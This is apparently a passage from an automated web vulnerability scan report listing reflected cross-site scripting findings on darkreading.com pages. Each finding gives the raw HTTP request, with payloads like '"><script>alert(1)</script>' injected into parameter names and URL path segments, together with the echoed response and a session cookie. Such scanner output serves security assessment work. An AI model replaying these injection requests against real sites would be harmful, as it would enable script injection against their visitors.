Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1183308/0/16/ADTECH;alias=DarkReading_Blogs_WelcomeAd_1x1;key=/blog/archives/security-viewsa624d';f74133ddbff/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292114127;misc='+new Date().getTime()+'"> ...[SNIP]...
3.423. http://www.darkreading.com/blog/archives/security-views/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/security-views/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e627"><script>alert(1)</script>6f043ecd221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/security-views/index.html?3e627"><script>alert(1)</script>6f043ecd221=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efcaa'%3b46706480a8 was submitted in the REST URL parameter 3. This input was echoed as efcaa';46706480a8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/sophoslabs-insightsefcaa'%3b46706480a8/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18829"><script>alert(1)</script>ec412ececd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/sophoslabs-insights18829"><script>alert(1)</script>ec412ececd3/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... chives%2Fsophoslabs-insights18829%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eec412ececd3%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/sophoslabs-insights18829"><script>alert(1)</script>ec412ececd3/index.html"> ...[SNIP]...
3.426. http://www.darkreading.com/blog/archives/sophoslabs-insights/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/sophoslabs-insights/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a122"><script>alert(1)</script>7662bd3a05a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/sophoslabs-insights/index.html?3a122"><script>alert(1)</script>7662bd3a05a=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... -insights%2Findex.html%3F3a122%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7662bd3a05a%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/sophoslabs-insights/index.html?3a122"><script>alert(1)</script>7662bd3a05a=1"> ...[SNIP]...
3.427. http://www.darkreading.com/blog/calendar.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/calendar.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bdc1"><script>alert(1)</script>b2c686c48f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/calendar.html?9bdc1"><script>alert(1)</script>b2c686c48f=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... A%2F%2Fwww.darkreading.com%2Fblog%2Fcalendar.html%3F9bdc1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb2c686c48f%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/calendar.html?9bdc1"><script>alert(1)</script>b2c686c48f=1"> ...[SNIP]...
3.428. http://www.darkreading.com/newsletters/subscribe.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /newsletters/subscribe.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36893"><script>alert(1)</script>df6bd4613e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletters/subscribe.html?36893"><script>alert(1)</script>df6bd4613e9=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Dark Read ...[SNIP]... ading.com%2Fnewsletters%2Fsubscribe.html%3F36893%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edf6bd4613e9%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/newsletters/subscribe.html?36893"><script>alert(1)</script>df6bd4613e9=1"> ...[SNIP]...
3.429. http://www.darkreading.com/security/antivirus [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/antivirus
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd6f"><script>alert(1)</script>db3cd6751d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/antivirus?cfd6f"><script>alert(1)</script>db3cd6751d1=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Antivirus ...[SNIP]... %2F%2Fwww.darkreading.com%2Fsecurity%2Fantivirus%3Fcfd6f%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edb3cd6751d1%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/antivirus?cfd6f"><script>alert(1)</script>db3cd6751d1=1"> ...[SNIP]...
3.430. http://www.darkreading.com/security/application-security [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/application-security
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9677"><script>alert(1)</script>9b902f96db0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/application-security?a9677"><script>alert(1)</script>9b902f96db0=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aad7d"><a>9375303c7a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articleaad7d"><a>9375303c7a3/208803634/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e797"><a>4ad869e08c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2088036345e797"><a>4ad869e08c/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 16e32'><a>98fa3b7a21e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/208803634/index.html16e32'><a>98fa3b7a21e HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a67e9"><a>b84c55a0d32 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/208803634/index.htmla67e9"><a>b84c55a0d32 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Social En ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F208803634%2Findex.htmla67e9%22%3E%3Ca%3Eb84c55a0d32&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/208803634/index.htmla67e9"><a>b84c55a0d32"> ...[SNIP]...
3.435. http://www.darkreading.com/security/article/208803634/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/208803634/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d8f"><script>alert(1)</script>b741d94c8e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/208803634/index.html?13d8f"><script>alert(1)</script>b741d94c8e4=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef86"><a>996ace43219 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articlebef86"><a>996ace43219/208803672/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 810ac"><a>e7155387f03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/208803672810ac"><a>e7155387f03/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf079"><a>2846627ef99 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/208803672/index.htmlbf079"><a>2846627ef99 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 285cc'><a>3e43d09413c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/208803672/index.html285cc'><a>3e43d09413c HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Turkish H ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/208803672/index.html285cc'><a>3e43d09413c'> ...[SNIP]...
3.440. http://www.darkreading.com/security/article/208803672/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/208803672/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e04e3"><script>alert(1)</script>a3bca52555b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/208803672/index.html?e04e3"><script>alert(1)</script>a3bca52555b=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49db6"><a>023321e16f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article49db6"><a>023321e16f7/220000718/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc414"><a>a4e3606a352 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/220000718bc414"><a>a4e3606a352/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 82725'><a>46bd8fd319b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/220000718/index.html82725'><a>46bd8fd319b HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faf9c"><a>262949bdd88 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/220000718/index.htmlfaf9c"><a>262949bdd88 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Antivirus ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F220000718%2Findex.htmlfaf9c%22%3E%3Ca%3E262949bdd88&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/220000718/index.htmlfaf9c"><a>262949bdd88"> ...[SNIP]...
3.445. http://www.darkreading.com/security/article/220000718/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /security/article/220000718/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e5c6"><script>alert(1)</script>de2e1b78aeb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/220000718/index.html?5e5c6"><script>alert(1)</script>de2e1b78aeb=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7021d"><a>0aad94137b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article7021d"><a>0aad94137b/222200174/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f7c6"><a>47c8f3b1d89 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2222001743f7c6"><a>47c8f3b1d89/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f1d8a'><a>ed240ad1ff0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222200174/index.htmlf1d8a'><a>ed240ad1ff0 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baa92"><a>828205fc86d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222200174/index.htmlbaa92"><a>828205fc86d HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
